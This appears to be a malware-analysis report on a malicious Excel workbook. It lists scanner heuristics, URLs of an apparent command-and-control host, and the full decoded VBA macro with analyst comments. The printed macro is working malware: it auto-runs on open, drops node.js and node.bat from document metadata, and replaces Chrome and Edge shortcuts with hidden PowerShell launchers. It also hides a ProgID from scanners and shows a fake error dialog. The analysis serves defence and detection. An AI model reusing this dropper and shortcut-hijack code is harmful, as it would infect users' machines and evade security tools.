MALICIOUS
318
Risk Score
Heuristics 10
-
VBA macros detected — medium — 6 related findings — OLE_VBA_MACROS: Document contains VBA macro code.
-
PowerShell reference in VBA — critical — OLE_VBA_PS: PowerShell reference in VBA. Matched line in script:
targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -
Dangerous API name reassembled from split string literals — critical — OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script:
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell") -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell") -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Rated low in isolation, but in this sample it is the auto-execution trigger for the entire chain (Workbook_Open calls TestFileExists, which performs the shortcut replacement and file drops). Matched line in script:
Private Sub Workbook_Open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access); here USERNAME is read to build per-user drop and shortcut paths. Matched line in script:
uname = Environ("USERNAME") -
Reference to PowerShell — high — SC_STR_POWERSHELL: Reference to PowerShell.
-
LOLBin token sequence in document text — high — SE_LOLBIN_RUN_COMMAND: Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, …) reached each URL. Note that none of these URLs appear in the decoded VBA source below; they are presumably carried in the dropped node.js/node.bat payloads, which are stored in the document properties and not shown here. URLs: http://api-instance.btobwah.com/mode/scripts/get_comm_re.php — in document text (OLE body)
- http://api-instance.btobwah.com/mode/scripts/api.php?action=Fcnn&instance_name= — in document text (OLE body)
- http://api-instance.btobwah.com/ — in document text (OLE body)
- https://nodejs.org/download/release/latest-v22.x/win-x86/node.exe — in document text (OLE body); a legitimate download location, presumably used to fetch the Node.js runtime that executes the dropped node.js — confirm from the carved node.bat
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10516 bytes |
| SHA-256: e6fd548db70cd7fcf96f7e9380863b016efdc8cb0d89dfee67deca1e622817b3 | | | |
Preview script — first 1,000 lines of the extracted script. Analyst annotations below are prefixed with ' (VBA comments); all code lines are reproduced as extracted.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module-level state shared by the routines below; all of it is set in
' TestFileExists and read by dlkfo / CDFWithS / MDFWithS.
Public chrome As Integer   ' 1 when a chrome.exe install path was found, else 0
Public msedge As Integer   ' 2 when an msedge.exe install path was found, else 0
Public cam As Integer      ' chrome + msedge: 1 = Chrome only, 2 = Edge only, 3 = both, 0 = neither
Public ctPath As String    ' full path of the real chrome.exe (launched from, and icon of, the fake shortcut)
Public mtPath As String    ' full path of the real msedge.exe (same role for Edge)
' Decoy dialog. Shows a fake Office "file cannot be opened" error so the
' victim believes the document simply failed to open; TestFileExists calls
' it both when no browser is found and after the drops have completed.
' The lure text's misspelling ("whit") is a convenient detection string.
Sub ShowWMessage()
    Dim message As String
    Dim title As String
    message = "Office has detected a problem whit this file. To help protect your computer this file cannot be opened."
    title = "Microsoft Excel"   ' spoofed dialog title
    MsgBox message, vbExclamation, title
End Sub
' Creates c:\users\<USERNAME>\.node\bin one path component at a time; this is
' the drop directory used by ESBFCtots.
' Note: Split("\.node\bin\", "\") yields a leading and a trailing empty
' element, so the loop also probes "c:\users\<user>\" and "...\bin\", and the
' joined path carries a doubled "\\" before ".node". Whether Dir/MkDir accept
' these forms is not established by the code itself — confirm in a sandbox run.
' There is no On Error handler anywhere in the module, so a failing MkDir
' would surface as a VBA runtime error and halt the macro.
Sub CreateRecursiveFolder_MkDir()
    Dim path As String
    Dim folders() As String
    Dim currentPath As String
    Dim i As Integer
    Dim uname As String
    uname = Environ("USERNAME")                 ' per-user drop location
    path = "\.node\bin\"
    folders = Split(path, "\")
    currentPath = "c:\users\" + uname           ' hard-coded profile root rather than %USERPROFILE%
    For i = LBound(folders) To UBound(folders)
        ' currentPath starts non-empty, so the IIf always takes the concatenation branch.
        currentPath = IIf(currentPath = "", folders(i), currentPath & "\" & folders(i))
        If Dir(currentPath, vbDirectory) = "" Then
            MkDir currentPath
        End If
    Next i
End Sub
' Stage-1 dropper. Rebuilds a 3,877-byte payload hidden in the workbook's
' "Title" document property and writes it as C:\Users\<USERNAME>\.node\bin\node.js
' (the folder is created first via CreateRecursiveFolder_MkDir).
' Encoding: one character per byte; 0xDF stands in for 0x00 because the
' property string cannot carry a NUL. The payload bytes are not in this
' listing — recover them from the sample's "Title" property.
' Does nothing (silently) if the property is empty or holds fewer than 3,878 characters.
Sub ESBFCtots()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim uname As String
    Dim i As Long
    Call CreateRecursiveFolder_MkDir
    uname = Environ("USERNAME")
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Title")   ' payload carrier: document metadata
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    byteArray = StringToByteArray(fileComment)
    startByte = 1                     ' 1-based; combined with the -1 below this reads from index 0
    byteCount = 3877                  ' fixed payload length
    If startByte + byteCount - 1 > UBound(byteArray) Then   ' UBound = Len - 1, so Len must be >= 3878
        Exit Sub
    End If
    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    ' Decode step: every 0xDF becomes 0x00 (so the decoded payload can never contain 0xDF).
    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    filePath = "C:\Users\" + uname + "\.node\bin\node.js"   ' dropped file (IOC)
    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber   ' Binary mode does not truncate a longer pre-existing file
    Put #fileNumber, , extractedBytes
    Close #fileNumber
End Sub
' Stage-2 dropper, same scheme as ESBFCtots: rebuilds a 357-byte payload from
' the workbook's "Comments" document property (0xDF -> 0x00 decoding) and
' writes it to C:\Users\Public\Documents\node.bat. This is the file that the
' trojanised browser shortcuts execute through PowerShell (see MDFWithS /
' CDFWithS). The batch content is not in this listing — recover it from the
' "Comments" property; the nodejs.org / btobwah.com URLs reported above are
' presumably referenced from it.
' Does nothing (silently) if the property is empty or shorter than 358 characters.
Sub BFtodoc()
    Dim fileComment As String
    Dim byteArray() As Byte
    Dim extractedBytes() As Byte
    Dim filePath As String
    Dim fileNumber As Integer
    Dim startByte As Long
    Dim byteCount As Long
    Dim i As Long
    fileComment = ThisWorkbook.BuiltinDocumentProperties("Comments")   ' payload carrier: document metadata
    If Len(fileComment) = 0 Then
        Exit Sub
    End If
    byteArray = StringToByteArray(fileComment)
    startByte = 1                     ' reads from index 0 (see index arithmetic below)
    byteCount = 357                   ' fixed payload length
    If startByte + byteCount - 1 > UBound(byteArray) Then   ' UBound = Len - 1, so Len must be >= 358
        Exit Sub
    End If
    ReDim extractedBytes(byteCount - 1)
    For i = 0 To byteCount - 1
        extractedBytes(i) = byteArray(startByte + i - 1)
    Next i
    ' Decode step: 0xDF is the placeholder for NUL.
    For i = 0 To UBound(extractedBytes)
        If extractedBytes(i) = &HDF Then
            extractedBytes(i) = &H0
        End If
    Next i
    filePath = "C:\Users\Public\Documents\node.bat"   ' dropped file (IOC); world-writable location
    fileNumber = FreeFile
    Open filePath For Binary Access Write As #fileNumber   ' Binary mode does not truncate a longer pre-existing file
    Put #fileNumber, , extractedBytes
    Close #fileNumber
End Sub
' Converts a string to a byte array, one byte per character via Asc().
' Asc() returns the ANSI code of the character, so characters outside the
' system code page would presumably not round-trip — which is why the callers
' use a substitute byte (0xDF) for NUL instead of embedding it directly.
' The counter is an Integer, so a carrier longer than 32,767 characters would overflow.
Function StringToByteArray(str As String) As Byte()
    Dim i As Integer
    Dim byteArray() As Byte
    ReDim byteArray(Len(str) - 1)   ' Len = 0 would raise here; callers guard against it
    For i = 1 To Len(str)
        byteArray(i - 1) = Asc(Mid(str, i, 1))
    Next i
    StringToByteArray = byteArray
End Function
' Writes a .lnk at dfPath that masquerades as Microsoft Edge: the icon is the
' real msedge.exe (mtPath) but the target is 32-bit PowerShell, which first
' starts the genuine browser (so the victim notices nothing) and then runs the
' dropped C:\Users\Public\Documents\node.bat. This is the persistence /
' re-execution mechanism: every browser launch via the shortcut re-runs the payload.
'   -w 1           -WindowStyle 1, presumably Hidden (ProcessWindowStyle numbering)
'   -c "..."       -Command; `saps` is PowerShell's built-in alias for Start-Process
'   windowStyle 7  shortcut opens minimised
' The WScript.Shell ProgID is assembled from three fragments purely to evade
' keyword scanning (flagged above as OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
' SysWOW64 is the WoW64 directory, so the target only resolves on 64-bit Windows.
' Relies on mtPath having been set by TestFileExists.
Sub MDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + mtPath + "';C:\Users\Public\Documents\node.bat"""
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")   ' = "WScript.Shell"
    Set shortcut = WshShell.CreateShortcut(dfPath)           ' Save below creates or overwrites the .lnk
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = mtPath                           ' borrow the real Edge icon
    shortcut.windowStyle = 7
    shortcut.Save
End Sub
' Chrome counterpart of MDFWithS: writes a .lnk at dfPath whose icon is the
' real chrome.exe (ctPath) but whose target is 32-bit PowerShell, which starts
' the genuine browser and then runs the dropped node.bat. Identical command
' line and obfuscated ProgID as MDFWithS; only the browser path differs.
' Relies on ctPath having been set by TestFileExists.
Sub CDFWithS(ByVal dfPath As String)
    Dim WshShell As Object
    Dim shortcut As Object
    Dim targetPath As String
    Dim arguments As String
    targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    arguments = "-w 1 -c ""saps '" + ctPath + "';C:\Users\Public\Documents\node.bat"""   ' saps = Start-Process
    Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")   ' = "WScript.Shell", split to evade keyword scans
    Set shortcut = WshShell.CreateShortcut(dfPath)
    shortcut.targetPath = targetPath
    shortcut.arguments = arguments
    shortcut.IconLocation = ctPath                           ' borrow the real Chrome icon
    shortcut.windowStyle = 7                                 ' minimised
    shortcut.Save
End Sub
' True when Dir() returns a match for filePath. Dir accepts wildcards and each
' call resets VBA's Dir() enumeration state, so this is a loose existence
' probe rather than an exact-path check. Used to detect installed browsers
' and which shortcut files are present.
Function FileExists(ByVal filePath As String) As Boolean
    FileExists = (Dir(filePath) <> "")
End Function
' Deletes lPath via Scripting.FileSystemObject with force = True (read-only
' attribute ignored). dlkfo uses it to remove the all-users browser shortcuts
' (ProgramData Start Menu, Public Desktop) so only the trojanised per-user
' copies remain. Note the ProgID is written in the clear here, unlike the
' split "WScript.Shell" literal. There is no On Error handler in the module:
' a permission-denied error (plausible for a non-admin user on the ProgramData
' paths) would halt the whole macro — verify the outcome in a sandbox.
Sub DFL(ByVal lPath As String)
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile lPath, True
    Set fso = Nothing
End Sub
' Shortcut-hijack routine. fg is the `cam` value from TestFileExists:
'   1 = Chrome only, 2 = Edge only, 3 = both (the fg = 3 branch is simply the
'   1 and 2 branches concatenated).
' For each browser it (a) deletes the all-users Start Menu shortcut under
' ProgramData, (b) deletes the Public Desktop shortcut and (re)writes the
' per-user Desktop one, and (c) overwrites the per-user Desktop, "<name> -
' Shortcut.lnk", pinned-taskbar and Quick Launch shortcuts with PowerShell
' launchers (CDFWithS / MDFWithS). Declared as a Function but never assigns a
' return value, so it returns Empty; callers ignore it.
Function dlkfo(ByVal fg As Integer)
    Dim lps1 As String
    Dim lps2 As String
    Dim lps3 As String
    Dim lps4 As String
    Dim lps33 As String
    Dim lps333 As String
    Dim lps44 As String
    Dim lps444 As String
    Dim lps5 As String
    Dim lps6 As String
    Dim lps7 As String
    Dim lps8 As String
    Dim smpth As String      ' unused
    Dim sgpth As String      ' unused
    Dim userName As String
    userName = Environ("USERNAME")
    ' All-users Start Menu entries (deleted, not replaced).
    lps1 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk"
    lps2 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"
    ' Per-user Desktop shortcuts (replaced).
    lps3 = "c:\Users\" + userName + "\Desktop\Google Chrome.lnk"
    lps4 = "c:\Users\" + userName + "\Desktop\Microsoft Edge.lnk"
    ' Public Desktop shortcuts (deleted; the per-user copy is written instead).
    lps33 = "c:\Users\Public\Desktop\Google Chrome.lnk"
    lps44 = "c:\Users\Public\Desktop\Microsoft Edge.lnk"
    ' Default names Windows gives a manually created shortcut (replaced).
    lps333 = "c:\Users\" + userName + "\Desktop\chrome - Shortcut.lnk"
    lps444 = "c:\Users\" + userName + "\Desktop\msedge - Shortcut.lnk"
    ' Pinned-taskbar shortcuts (replaced).
    lps5 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
    lps6 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"
    ' Quick Launch shortcuts (replaced).
    lps7 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
    lps8 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
    If fg = 1 Then
        ' --- Chrome only ---
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            ' Public Desktop copy removed; the per-user Desktop .lnk is written
            ' whether or not it existed (CreateShortcut/Save presumably creates it).
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
    ElseIf fg = 2 Then
        ' --- Edge only ---
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
    ElseIf fg = 3 Then
        ' --- Both browsers: Chrome block then Edge block, verbatim ---
        If FileExists(lps1) Then
            Call DFL(lps1)
        End If
        If FileExists(lps3) Then
            Call CDFWithS(lps3)
        End If
        If FileExists(lps33) Then
            Call DFL(lps33)
            Call CDFWithS(lps3)
        End If
        If FileExists(lps333) Then
            Call CDFWithS(lps333)
        End If
        If FileExists(lps5) Then
            Call CDFWithS(lps5)
        End If
        If FileExists(lps7) Then
            Call CDFWithS(lps7)
        End If
        If FileExists(lps2) Then
            Call DFL(lps2)
        End If
        If FileExists(lps4) Then
            Call MDFWithS(lps4)
        End If
        If FileExists(lps44) Then
            Call DFL(lps44)
            Call MDFWithS(lps4)
        End If
        If FileExists(lps444) Then
            Call MDFWithS(lps444)
        End If
        If FileExists(lps6) Then
            Call MDFWithS(lps6)
        End If
        If FileExists(lps8) Then
            Call MDFWithS(lps8)
        End If
    End If
End Function
' Orchestrator (the name understates it). Probes the 64-bit and 32-bit install
' paths of Chrome and Edge, records the result in the module globals
' (chrome = 1, msedge = 2, cam = sum), then — if at least one browser is
' present — hijacks its shortcuts, drops the two payload files and finally
' shows the decoy error. With no browser found only the decoy is shown and
' nothing is written to disk.
' Order matters for analysis: shortcuts are rewritten (dlkfo) BEFORE
' node.js / node.bat are written, so a shortcut pointing at a not-yet-existing
' node.bat exists briefly.
Sub TestFileExists()
    Dim c1 As String
    Dim c2 As String
    Dim m1 As String
    Dim m2 As String
    c1 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
    c2 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    m1 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
    m2 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    If FileExists(c1) Then
        chrome = 1
        ctPath = c1
    ElseIf FileExists(c2) Then
        chrome = 1
        ctPath = c2
    Else
        chrome = 0
    End If
    If FileExists(m1) Then
        msedge = 2
        mtPath = m1
    ElseIf FileExists(m2) Then
        msedge = 2
        mtPath = m2
    Else
        msedge = 0
    End If
    cam = chrome + msedge            ' 1 / 2 / 3 selects the dlkfo branch
    If cam = 0 Then
        Call ShowWMessage            ' no target browser: decoy only
        Exit Sub
    Else
        Call dlkfo(cam)              ' 1. replace browser shortcuts with PowerShell launchers
        Call ESBFCtots               ' 2. drop C:\Users\<user>\.node\bin\node.js from the "Title" property
        Call BFtodoc                 ' 3. drop C:\Users\Public\Documents\node.bat from the "Comments" property
        Call ShowWMessage            ' 4. decoy "cannot be opened" dialog
    End If
End Sub
' Auto-execution entry point: runs as soon as macros are enabled, with no
' further user interaction. Visible chain in this module:
'   Workbook_Open -> TestFileExists
'     -> dlkfo(cam)   replace Chrome/Edge .lnk files with PowerShell launchers
'     -> ESBFCtots    drop C:\Users\<USERNAME>\.node\bin\node.js ("Title" property)
'     -> BFtodoc      drop C:\Users\Public\Documents\node.bat ("Comments" property)
'     -> ShowWMessage fake "cannot be opened" dialog
' Persistence is the replaced shortcuts: the victim's next browser launch runs
' node.bat. What node.bat / node.js do (e.g. fetching node.exe from the
' nodejs.org URL and contacting api-instance.btobwah.com, both seen only in
' the document text above) is not shown in this listing — confirm from the
' carved payloads before asserting C2 behaviour.
Private Sub Workbook_Open()
    Call TestFileExists
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True